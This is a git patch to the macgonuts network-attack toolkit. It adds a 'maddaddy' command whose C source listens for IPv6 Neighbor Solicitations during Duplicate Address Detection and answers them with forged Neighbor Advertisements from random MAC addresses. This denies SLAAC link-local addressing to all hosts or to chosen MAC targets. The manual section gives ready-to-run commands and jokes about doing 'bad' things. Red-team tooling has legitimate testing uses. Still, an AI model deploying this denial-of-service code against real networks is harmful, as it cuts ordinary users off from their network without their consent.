From 0357e735d23e7f036b64f03188e3998ee66fc3a9 Mon Sep 17 00:00:00 2001
From: rafael-santiago <voidbrainvoid@tutanota.com>
Date: Tue, 26 Sep 2023 23:59:53 -0300
Subject: [PATCH] Implement maddaddy task

---
 README.md                         |   4 +-
 doc/MANUAL.md                     |  50 +++-
 src/cmd/macgonuts_banners.c       |  30 ++-
 src/cmd/macgonuts_exec.c          |   2 +
 src/cmd/macgonuts_maddaddy_task.c | 388 ++++++++++++++++++++++++++++++
 src/cmd/macgonuts_maddaddy_task.h |  17 ++
 6 files changed, 482 insertions(+), 9 deletions(-)
 create mode 100644 src/cmd/macgonuts_maddaddy_task.c
 create mode 100644 src/cmd/macgonuts_maddaddy_task.h

diff --git a/README.md b/README.md
index fd7c090..43fc311 100644
--- a/README.md
+++ b/README.md
@@ -38,8 +38,8 @@ red teams. *Once it stated, when using this tool you are assuming that any damag
 law infringements that some wrong action taken by you could cause is of your entire responsibility*.
 
 **Sponsoring**:  I have not been running this project for profit. It is only a thing that I do at my spare time. It is a
-weekend project. I try to evolve it according to necessities I have been facing up during my information security
-professional career. If you liked it or it is being useful to you somehow and you really want to contribute
+weekend project. A pet project. I try to evolve it according to necessities I have been facing up during my information
+security professional career. If you liked it or it is being useful to you somehow and you really want to contribute
 with money, try to redirect it to a local charity institution, an ONG of your choice or even your own community.
 You can also do [pull requests](https://github.com/rafael-santiago/macgonuts/pulls) proposing improvements.
 Do some [bug report](https://github.com/rafael-santiago/macgonuts/issues) if a bug is annoying you. Maybe you should
diff --git a/doc/MANUAL.md b/doc/MANUAL.md
index 37a90b5..94abd4e 100644
--- a/doc/MANUAL.md
+++ b/doc/MANUAL.md
@@ -16,6 +16,7 @@
     - [The dnsspoof command](#the-dnsspoof-command)
     - [The xablau command](#the-xablau-command)
     - [The caleaboqui command](#the-caleaboqui-command)
+    - [The maddaddy command](#the-maddaddy-command)
 - [Catsparrow's ``macgonuts`` commands cheat sheet](#catsparrows-macgonuts-commands-cheat-sheet)
 
 ## What does ``macgonuts`` is for?
@@ -809,6 +810,52 @@ Well, now you master anything about silence, congrats!
 
 [``Back``](#topics)
 
+### The maddaddy command
+
+><img src="https://github.com/rafael-santiago/macgonuts/blob/main/etc/angry-hiss.gif" title="Grrrr! C4uTion is now logged in..."
+     alt="Grrrr! C4uTion is now logged in..." width="70" />
+ If you want to deny `SLAAC` based `link-local` address atribution in an `IPv6` network or being more straightforward if you
+want to promote a `DoS` attack by exploiting `DAD`. "Let's go baby, let's go bad, you should give try to ma-ma-ma-maddady" :stuck_out_tongue_winking_eye:
+
+The `maddaddy` is a pretty straightforward command. All it expects is the interface that you use to access the `IPv6` available
+in your network environment.
+
+Yeah, ridiculous but: story time!!!!
+
+Once upon time `GooGoo`. He hated network addresses in hexadecimal format and made up his mind about deny any device in his
+network of using this bad idea. Otherwise he would use name callings in `IPv6` addresses as a kind of mnemonics, since
+`GooGoo` was a well-behaved guy, he decided to promote a `DoS` on `IPv6` with his favorite `macgonuts`' command: `maddaddy`.
+
+So all `GooGoo` did was:
+
+```
+GooGoo@OffTheRoad:~# macgonuts maddaddy --lo-iface=eth0
+```
+
+At this point `GooGoo` started to listen to `neighbor solicitation` in a certain addressing range and when it found
+`GooGoo` mocked fake `neighbor advertisements` by avoiding new hosts of ingressing in the network with a valid `IPv6`
+address. As a result no hosts will be automatically configured by `SLAAC`. Muahauhauahuahauhaua!
+
+However, let's supose that `GooGoo` had specific targets. So only those targets should be blocked of ingressing in the network.
+Well all `GooGoo` needed to use was the `--targets` option. This option expects `MAC` addresses separated by comma.
+Take a look:
+
+```
+GooGoo@OffTheRoad:~# macgonuts maddaddy --lo-iface=eth0 \
+> --targets=00:11:22:33:44:55,AA:BB:CC:DD:EE:00,ab:cd:ef:12:23:56
+```
+
+From now on only the hosts using the indicated `MAC` address would be blocked.
+
+So `maddaddy` causes in the target hosts a `"dadfailed"` by making the hosts of automatically be able to have the minimal
+link-local addressing to boot up `IPv6`. You know, `maddaddy` is a kind of bad command for bad people...
+
+Well, if you did not notice yet, `maddaddy` is a humble tribute to one of my favorite rock bands ever: `The Cramps`!
+
+Congrats! Now you are a master of `ma-ma ma-ma ma-ma-mad daddy`! :satisfied: :sunglasses:
+
+[``Back``](#topics)
+
 ## Catsparrow's ``macgonuts`` commands cheat sheet
 
 > <img src="https://github.com/rafael-santiago/macgonuts/blob/main/etc/catsparrow.gif" title="Grrrr! C4uTion is now logged in..."
@@ -826,11 +873,12 @@ exploiting addressing resolution on `IPv4/IPv6` networks around, "yo-ho-ho!" :ro
 |:-------------:|:-------------------------:|
 | I need to make a host thinks that I am another host, so I can manipulate this traffic somehow | `spoof` |
 | I need to capture the session between two hosts into my `LAN` or segmented `LAN` | `eavesdrop` |
-| I need to avoid n hosts to talk to one | `isolate` |
+| I need to avoid `n` hosts to talk to one | `isolate` |
 | I need to spread disorder into my `LAN` by making it unstable | `mayhem` |
 | I need to redirect a host to another host through a fake `FQDN` resolution | `dnsspoof` |
 | I need to discover possible targets into my `LAN` | `xablau` (or its alias `neighscan`) |
 | I need to avoid internet access from a single host or multiple hosts | `caleaboqui` (or its alias `shh`) |
+| I need to make any host in my `LAN` be unable to get a valid `link-local` | `maddaddy` |
 | I need to know what `macgonuts` version I am running | `version` |
 | I need some help | `help` |
 
diff --git a/src/cmd/macgonuts_banners.c b/src/cmd/macgonuts_banners.c
index 6dcb60a..b6a66af 100644
--- a/src/cmd/macgonuts_banners.c
+++ b/src/cmd/macgonuts_banners.c
@@ -24,12 +24,30 @@ static const struct gradients {
     int floor;
     int ceil;
 } g_GradientRanges[] = {
-    { 52, 58 }, { 88, 94 }, { 124, 130 }, { 160, 166 }, { 196, 202 },
-    { 22, 28 }, { 58, 64 }, {  94, 100 }, { 130, 136 }, { 166, 172 }, { 202, 208 },
-    { 28, 34 }, { 64, 70 }, { 100, 106 }, { 136, 142 }, { 172, 178 }, { 208, 214 },
-    { 34, 40 }, { 70, 76 }, { 106, 112 }, { 142, 148 }, { 178, 184 }, { 214, 220 },
-    { 40, 46 }, { 76, 82 }, { 112, 118 }, { 148, 154 }, { 184, 190 }, { 220, 226 },
-    { 46, 52 }, { 82, 88 }, { 118, 124 }, { 154, 160 }, { 190, 196 },
+    { 124, 130 },
+    { 160, 166 },
+    { 196, 202 },
+    { 130, 136 },
+    { 166, 172 },
+    { 202, 208 },
+    { 172, 178 },
+    { 208, 214 },
+    {  34,  40 },
+    {  70,  76 },
+    { 142, 148 },
+    { 178, 184 },
+    { 214, 220 },
+    {  40,  46 },
+    {  76,  82 },
+    { 112, 118 },
+    { 148, 154 },
+    { 184, 190 },
+    { 220, 226 },
+    {  46,  52 },
+    {  82,  88 },
+    { 118, 124 },
+    { 154, 160 },
+    { 190, 196 },
     { 232, 244 },
 };
 
diff --git a/src/cmd/macgonuts_exec.c b/src/cmd/macgonuts_exec.c
index c48864b..6486929 100644
--- a/src/cmd/macgonuts_exec.c
+++ b/src/cmd/macgonuts_exec.c
@@ -17,6 +17,7 @@
 #include <cmd/macgonuts_dnsspoof_task.h>
 #include <cmd/macgonuts_xablau_task.h>
 #include <cmd/macgonuts_caleaboqui_task.h>
+#include <cmd/macgonuts_maddaddy_task.h>
 #include <cmd/macgonuts_version_task.h>
 #include <cmd/macgonuts_banners.h>
 #include <macgonuts_status_info.h>
@@ -49,6 +50,7 @@ struct macgonuts_task_ctx {
     MACGONUTS_CMD_REGISTER_TASK(dnsspoof),
     MACGONUTS_CMD_REGISTER_TASK(xablau),
     MACGONUTS_CMD_REGISTER_TASK(caleaboqui),
+    MACGONUTS_CMD_REGISTER_TASK(maddaddy),
     MACGONUTS_CMD_REGISTER_TASK_ALIAS(xablau, neighscan),
     MACGONUTS_CMD_REGISTER_TASK_ALIAS(caleaboqui, shh),
     MACGONUTS_CMD_REGISTER_TASK(version),
diff --git a/src/cmd/macgonuts_maddaddy_task.c b/src/cmd/macgonuts_maddaddy_task.c
new file mode 100644
index 0000000..bd266d7
--- /dev/null
+++ b/src/cmd/macgonuts_maddaddy_task.c
@@ -0,0 +1,388 @@
+/*
+ * Copyright (c) 2023, Rafael Santiago
+ * All rights reserved.
+ *
+ * This source code is licensed under the BSD-style license found in the
+ * LICENSE file in the root directory of this source tree.
+ */
+#include <cmd/macgonuts_maddaddy_task.h>
+#include <cmd/macgonuts_option.h>
+#include <macgonuts_etherconv.h>
+#include <macgonuts_socket_common.h>
+#include <macgonuts_socket.h>
+#include <macgonuts_icmphdr.h>
+#include <macgonuts_ndphdr.h>
+#include <macgonuts_ip6hdr.h>
+#include <macgonuts_ethfrm.h>
+#include <macgonuts_ipchsum.h>
+#include <macgonuts_status_info.h>
+
+static int g_QuitMadDaddy = 0;
+
+static int do_mad_daddy(const char *iface, const uint8_t *hw_addrs, const size_t hw_addrs_size);
+
+static inline int send_fake_na(const macgonuts_socket_t rsk,
+                               const uint8_t *ethbuf, const ssize_t ethbuf_size, const uint8_t *target_addr);
+
+static void sigint_watchdog(int signo);
+
+static uint8_t *preprocess_targets_array(char **targets, const size_t targets_nr, size_t *macs_buf_size);
+
+static uint8_t *preprocess_targets_array(char **targets, const size_t targets_nr, size_t *macs_buf_size);
+
+static inline int is_solicited_node_multicast_link(const uint8_t *ethbuf, const ssize_t ethbuf_size);
+
+static inline int is_solicited_node_multicast_proto(const uint8_t *ethbuf, const ssize_t ethbuf_size);
+
+static inline int is_ndp_ns(const uint8_t *ethbuf, const ssize_t ethbuf_size, uint8_t *target_addr);
+
+static inline int should_dad_go_bad(const uint8_t *ethbuf, const ssize_t ethbuf_size,
+                                    const uint8_t *hw_addrs, const size_t hw_addrs_size);
+
+int macgonuts_maddaddy_task(void) {
+    int err = EXIT_FAILURE;
+    const char *lo_iface = macgonuts_get_option("lo-iface", NULL);
+    char **targets = NULL;
+    size_t targets_nr = 0;
+    uint8_t *hw_addrs = NULL;
+    size_t hw_addrs_size = 0;
+
+    if (lo_iface == NULL) {
+        macgonuts_si_error("--lo-iface option is missing.\n");
+        goto macgonuts_maddaddy_task_epilogue;
+    }
+
+    targets = macgonuts_get_array_option("targets", NULL, &targets_nr);
+    if (targets != NULL) {
+        hw_addrs = preprocess_targets_array(targets, targets_nr, &hw_addrs_size);
+        macgonuts_free_array_option_value(targets, targets_nr);
+        targets = NULL;
+    }
+
+    err = do_mad_daddy(lo_iface, hw_addrs, hw_addrs_size);
+
+macgonuts_maddaddy_task_epilogue:
+
+    if (hw_addrs != NULL) {
+        free(hw_addrs);
+    }
+
+    if (targets != NULL) {
+        macgonuts_free_array_option_value(targets, targets_nr);
+    }
+
+    return err;
+}
+
+int macgonuts_maddaddy_task_help(void) {
+    macgonuts_si_print("use: macgonuts maddady --lo-iface=<label> [ --targets=<hw-addr-list> ]\n");
+    return EXIT_SUCCESS;
+}
+
+static int do_mad_daddy(const char *iface, const uint8_t *hw_addrs, const size_t hw_addrs_size) {
+    char buf[256];
+    macgonuts_socket_t rsk = -1;
+    uint8_t ethbuf[1<<10];
+    ssize_t ethbuf_size = 0;
+    uint8_t target_addr[16];
+
+    if (macgonuts_get_addr_from_iface_unix(buf, sizeof(buf) - 1, 6, iface) != EXIT_SUCCESS) {
+        macgonuts_si_error("interface `%s` does not support IPv6.\n");
+        return EXIT_FAILURE;
+    }
+
+    if (macgonuts_set_iface_promisc_on(iface) != EXIT_SUCCESS) {
+        macgonuts_si_error("unable to set %s to promisc mode.\n", iface);
+        return EXIT_FAILURE;
+    }
+
+    rsk = macgonuts_create_socket(iface, 1);
+    if (rsk == -1) {
+        macgonuts_si_error("unable to create raw socket.\n");
+        macgonuts_set_iface_promisc_off(iface);
+        return EXIT_FAILURE;
+    }
+
+    macgonuts_si_mode_enter_announce("maddaddy");
+
+    signal(SIGINT, sigint_watchdog);
+    signal(SIGTERM, sigint_watchdog);
+
+    while (!g_QuitMadDaddy) {
+        ethbuf_size = macgonuts_recvpkt(rsk, ethbuf, sizeof(ethbuf));
+        if (ethbuf_size > 0
+            && is_solicited_node_multicast_link(ethbuf, ethbuf_size)
+            && is_solicited_node_multicast_proto(ethbuf, ethbuf_size)
+            && is_ndp_ns(ethbuf, ethbuf_size, &target_addr[0])
+            && should_dad_go_bad(ethbuf, ethbuf_size, hw_addrs, hw_addrs_size)
+            && send_fake_na(rsk, ethbuf, ethbuf_size, &target_addr[0]) == EXIT_SUCCESS) {
+            (void)snprintf(buf, sizeof(buf) - 1,
+                           "%.2X:%.2X:%.2X:%.2X:%.2X:%.2X", ethbuf[ 6], ethbuf[ 7], ethbuf[ 8],
+                                                            ethbuf[ 9], ethbuf[10], ethbuf[11]);
+            macgonuts_si_info("SLAAC based network ingress was denied for device `%s`.\n", buf);
+        }
+        usleep(10);
+    }
+
+    macgonuts_release_socket(rsk);
+    macgonuts_set_iface_promisc_off(iface);
+
+    macgonuts_si_mode_leave_announce("maddaddy");
+
+    return EXIT_SUCCESS;
+}
+
+static void sigint_watchdog(int signo) {
+    g_QuitMadDaddy = 1;
+}
+
+static inline int send_fake_na(const macgonuts_socket_t rsk,
+                               const uint8_t *ethbuf, const ssize_t ethbuf_size,
+                               const uint8_t *target_addr) {
+    struct macgonuts_ethfrm_ctx eth;
+    struct macgonuts_ip6hdr_ctx ip6;
+    struct macgonuts_icmphdr_ctx icmp6;
+    struct macgonuts_ndp_nsna_hdr_ctx ndp;
+    struct macgonuts_ip6_pseudo_hdr_ctx ip6phdr;
+    int err = EXIT_FAILURE;
+    size_t icmp_pkt_size = 0;
+    unsigned char *fake_na = NULL;
+    size_t fake_na_size = 0;
+
+    assert(ethbuf_size > 54);
+
+    memset(&eth, 0, sizeof(eth));
+    memset(&ip6, 0, sizeof(ip6));
+    memset(&icmp6, 0, sizeof(icmp6));
+    memset(&ndp, 0, sizeof(ndp));
+    memset(&ip6phdr, 0, sizeof(ip6phdr));
+
+    ndp.reserv = 0x20000000; // INFO(Rafael): Override flag.
+    ndp.options = (uint8_t *)malloc(8);
+    if (ndp.options == NULL) {
+        macgonuts_si_error("unable to allocate NDP options buffer.\n");
+        goto send_fake_na_epilogue;
+    }
+    ndp.options_size = 8;
+
+    ndp.options[0] = 0x02;
+    ndp.options[1] = 0x01;
+    // INFO(Rafael): Na linha do "Mad Daddy" dos The Cramps precisamos ser malvados e
+    //               perversos e o mais stealth possivel, nao me chamo Dorothy... >:D
+    //               Criancas fechem os olhos que o tio doido vai zaralhar o SLAAC do
+    //               slack que nao configurou o IPv6 de forma menos carneiro...
+    //               O unico slack que eh bom eh o ware, Slackware onde meu rio faz
+    //               a curva! Linux sem systemd e rodinhas... Enfim, foco...
+    if (macgonuts_getrandom_raw_ether_addr(&ndp.options[2], 6) != EXIT_SUCCESS) {
+        macgonuts_si_error("unable to get random MAC address.\n");
+        goto send_fake_na_epilogue;
+    }
+    memcpy((uint8_t *)&ndp.target_addr, &target_addr[0], 16);
+
+    icmp6.type = kNDPMsgTypeNeighborAdvertisement;
+    icmp6.code = 0;
+    icmp6.payload = (uint8_t *)macgonuts_make_ndp_nsna_pkt(&ndp, &icmp6.payload_size);
+    if (icmp6.payload == NULL) {
+        macgonuts_si_error("unable to make NDP/NA packet.\n");
+        goto send_fake_na_epilogue;
+    }
+
+    ip6.version = 6;
+    ip6.next_header = 0x3A;
+    ip6.hop_limit = 0xFF;
+
+    memcpy(&ip6.src_addr[0], &target_addr[0], 16);
+
+    ip6.dest_addr[0] = 0xFF; // INFO(Rafael): All nodes (link-local scope).
+    ip6.dest_addr[1] = 0x02;
+    ip6.dest_addr[15] = 0x01;
+
+    memcpy(&ip6phdr.src_addr[0], &ip6.src_addr[0], sizeof(ip6phdr.src_addr));
+    memcpy(&ip6phdr.dest_addr[0], &ip6.dest_addr[0], sizeof(ip6phdr.dest_addr));
+    icmp_pkt_size = 4 + icmp6.payload_size;
+    ip6phdr.upper_layer_pkt_len[0] = (icmp_pkt_size >> 24) & 0xFF;
+    ip6phdr.upper_layer_pkt_len[1] = (icmp_pkt_size >> 16) & 0xFF;
+    ip6phdr.upper_layer_pkt_len[2] = (icmp_pkt_size >>  8) & 0xFF;
+    ip6phdr.upper_layer_pkt_len[3] = icmp_pkt_size & 0xFF;
+    ip6phdr.next_header[3] = ip6.next_header;
+
+    ip6.payload = (uint8_t *)macgonuts_make_icmp_pkt(&icmp6, &icmp_pkt_size, &ip6phdr, sizeof(ip6phdr));
+    if (ip6.payload == NULL) {
+        macgonuts_si_error("unable to make ICMP packet.\n");
+        goto send_fake_na_epilogue;
+    }
+    ip6.payload_length = icmp_pkt_size & 0xFFFF;
+
+    eth.dest_hw_addr[0] = 0x33;
+    eth.dest_hw_addr[1] = 0x33;
+    eth.dest_hw_addr[5] = 0x01;
+    memcpy(&eth.src_hw_addr[0], &ndp.options[2], sizeof(eth.src_hw_addr)); // INFO(Rafael): Sentiu? Fedeu.
+                                                                           //               Mas no modo stealth.
+                                                                           //               "Entao relaxa, afina o
+                                                                           //               violino, pega a gasolina
+                                                                           //               e risca o fosforo"
+                                                                           //                -- Nero (37 d.C segundos
+                                                                           //                    antes de merdar tudo).
+    eth.ether_type = MACGONUTS_ETHER_TYPE_IP6;
+
+    eth.data = (uint8_t *)macgonuts_make_ip6_pkt(&ip6, &eth.data_size);
+    if (eth.data == NULL) {
+        macgonuts_si_error("unable to make IPv6 packet.\n");
+        goto send_fake_na_epilogue;
+    }
+
+    fake_na = macgonuts_make_ethernet_frm(&eth, &fake_na_size);
+    if (fake_na == NULL) {
+        macgonuts_si_error("unable to make ethernet frame.\n");
+        goto send_fake_na_epilogue;
+    }
+
+    if (macgonuts_sendpkt(rsk, fake_na, fake_na_size) == fake_na_size) {
+        err = EXIT_SUCCESS; // MuHauHauhAUaHuAHAUhAUaHuHA!
+    }
+
+send_fake_na_epilogue: // INFO(Rafael): Com tanto comentario sincerao, isso aqui nem ficou tao ruim, hein?! :D
+
+    if (fake_na != NULL) {
+        free(fake_na);
+    }
+
+    macgonuts_release_ethfrm(&eth);
+    macgonuts_release_ip6hdr(&ip6);
+    macgonuts_release_icmphdr(&icmp6);
+    macgonuts_release_ndp_nsna_hdr(&ndp);
+
+    // WARN(Rafael): Viu? Desmistificou? Deu umas risadas? Entao blau! Desliga esse caiau e bora viver! ;)
+    //               Vai pegar um pouco de Vitamina D seu ser sombrio!! Vai dar uma volta sem seu cosplay
+    //               noturno de morcego, Vlad! Morrer de sedentarismo seria patetico! Serio mesmo...
+    //               so dizendo... Fui!
+
+    return err;
+}
+
+static uint8_t *preprocess_targets_array(char **targets, const size_t targets_nr, size_t *macs_buf_size) {
+    char **target = targets;
+    char **targets_end = targets + targets_nr;
+    uint8_t *macs_buf = NULL;
+    uint8_t *mp = NULL;
+
+    *macs_buf_size = targets_nr * 6;
+    macs_buf = (uint8_t *)malloc(*macs_buf_size);
+
+    if (macs_buf == NULL) {
+        macgonuts_si_error("unable to allocate MAC bufs list.\n");
+        return NULL;
+    }
+
+    mp = macs_buf;
+
+    while (target != targets_end) {
+        if (macgonuts_get_raw_ether_addr(mp, 6, *target, strlen(*target)) != EXIT_SUCCESS) {
+            macgonuts_si_error("unable to pre-process MAC `%s`.\n", *target);
+            free(macs_buf);
+            return NULL;
+        }
+        target++;
+        mp += 6;
+    }
+
+    return macs_buf;
+}
+
+static inline int is_solicited_node_multicast_link(const uint8_t *ethbuf, const ssize_t ethbuf_size) {
+    return (ethbuf_size > 14 && ethbuf[0] == 0x33 && ethbuf[1] == 0x33 && ethbuf[2] == 0xFF);
+}
+
+static inline int is_solicited_node_multicast_proto(const uint8_t *ethbuf, const ssize_t ethbuf_size) {
+    return (ethbuf_size > 54 // INFO(Rafael): Ethernet frame size + IPv6 header size.
+            && ethbuf[12     ] == 0x86 // INFO(Rafael): IPv6 ether type.
+            && ethbuf[13     ] == 0xDD
+            && ethbuf[14 + 24] == 0xFF // INFO(Rafael): Solicited node multicast address.
+            && ethbuf[14 + 25] == 0x02
+            && ethbuf[14 + 26] == 0x00
+            && ethbuf[14 + 27] == 0x00
+            && ethbuf[14 + 28] == 0x00
+            && ethbuf[14 + 29] == 0x00
+            && ethbuf[14 + 30] == 0x00
+            && ethbuf[14 + 31] == 0x00
+            && ethbuf[14 + 32] == 0x00
+            && ethbuf[14 + 33] == 0x00
+            && ethbuf[14 + 34] == 0x00
+            && ethbuf[14 + 35] == 0x01
+            && ethbuf[14 + 36] == 0xFF
+            && ethbuf[14 + 37] == ethbuf[3]
+            && ethbuf[14 + 38] == ethbuf[4]
+            && ethbuf[14 + 39] == ethbuf[5]);
+}
+
+static inline int is_ndp_ns(const uint8_t *ethbuf, const ssize_t ethbuf_size, uint8_t *target_addr) {
+    struct macgonuts_icmphdr_ctx icmp6;
+    struct macgonuts_ndp_nsna_hdr_ctx ndp;
+    int is = 0;
+
+    assert(ethbuf_size > 54);
+
+    memset(&icmp6, 0, sizeof(icmp6));
+    memset(&ndp, 0, sizeof(ndp));
+
+    if (macgonuts_read_icmp_pkt(&icmp6, &ethbuf[54], ethbuf_size - 54) != EXIT_SUCCESS
+        || icmp6.type != kNDPMsgTypeNeighborSolicitation
+        || icmp6.code != 0) {
+        goto is_ndp_ns_epilogue;
+    }
+
+    if (macgonuts_read_ndp_nsna_pkt(&ndp, icmp6.payload, icmp6.payload_size) != EXIT_SUCCESS) {
+        goto is_ndp_ns_epilogue;
+    }
+
+    is = (memcmp(&ndp.target_addr[0],
+                (uint8_t *)"\xFE\x80\x00\x00\x00\x00\x00\x00",
+                8) == 0); // INFO(Rafael): Does it seems a link local unicast address?
+
+    if (is) {
+        target_addr[ 0] = ndp.target_addr[0] & 0xFF;
+        target_addr[ 1] = (ndp.target_addr[0] >> 8) & 0xFF;
+        target_addr[ 2] = (ndp.target_addr[0] >> 16) & 0xFF;
+        target_addr[ 3] = (ndp.target_addr[0] >> 24) & 0xFF;
+        target_addr[ 4] = ndp.target_addr[1] & 0xFF;
+        target_addr[ 5] = (ndp.target_addr[1] >> 8) & 0xFF;
+        target_addr[ 6] = (ndp.target_addr[1] >> 16) & 0xFF;
+        target_addr[ 7] = (ndp.target_addr[1] >> 24) & 0xFF;
+        target_addr[ 8] = ndp.target_addr[2] & 0xFF;
+        target_addr[ 9] = (ndp.target_addr[2] >> 8) & 0xFF;
+        target_addr[10] = (ndp.target_addr[2] >> 16) & 0xFF;
+        target_addr[11] = (ndp.target_addr[2] >> 24) & 0xFF;
+        target_addr[12] = ndp.target_addr[3] & 0xFF;
+        target_addr[13] = (ndp.target_addr[3] >> 8) & 0xFF;
+        target_addr[14] = (ndp.target_addr[3] >> 16) & 0xFF;
+        target_addr[15] = (ndp.target_addr[3] >> 24) & 0xFF;
+    }
+
+is_ndp_ns_epilogue:
+
+    macgonuts_release_ndp_nsna_hdr(&ndp);
+    macgonuts_release_icmphdr(&icmp6);
+
+    return is;
+}
+
+static inline int should_dad_go_bad(const uint8_t *ethbuf, const ssize_t ethbuf_size,
+                                    const uint8_t *hw_addrs, const size_t hw_addrs_size) {
+    const uint8_t *curr_hw_addr = NULL;
+    const uint8_t *hw_addrs_end = hw_addrs + hw_addrs_size;
+    int go_bad = 0;
+
+    assert(ethbuf_size > 14);
+
+    if (hw_addrs == NULL || hw_addrs_size == 0) {
+        return 1;
+    }
+
+    curr_hw_addr = hw_addrs;
+    while (curr_hw_addr < hw_addrs_end && !go_bad) {
+        go_bad = (memcmp(&ethbuf[6], curr_hw_addr, 6) == 0);
+        curr_hw_addr += 6;
+    }
+
+    return go_bad;
+}
diff --git a/src/cmd/macgonuts_maddaddy_task.h b/src/cmd/macgonuts_maddaddy_task.h
new file mode 100644
index 0000000..e9ac850
--- /dev/null
+++ b/src/cmd/macgonuts_maddaddy_task.h
@@ -0,0 +1,17 @@
+/*
+ * Copyright (c) 2023, Rafael Santiago
+ * All rights reserved.
+ *
+ * This source code is licensed under the BSD-style license found in the
+ * LICENSE file in the root directory of this source tree.
+ */
+#ifndef MACGONUTS_CMD_MACGONUTS_MADDADDY_TASK_H
+#define MACGONUTS_CMD_MACGONUTS_MADDADDY_TASK_H 1
+
+#include <macgonuts_types.h>
+
+int macgonuts_maddaddy_task(void);
+
+int macgonuts_maddaddy_task_help(void);
+
+#endif // MACGONUTS_CMD_MACGONUTS_MADDADDY_TASK_H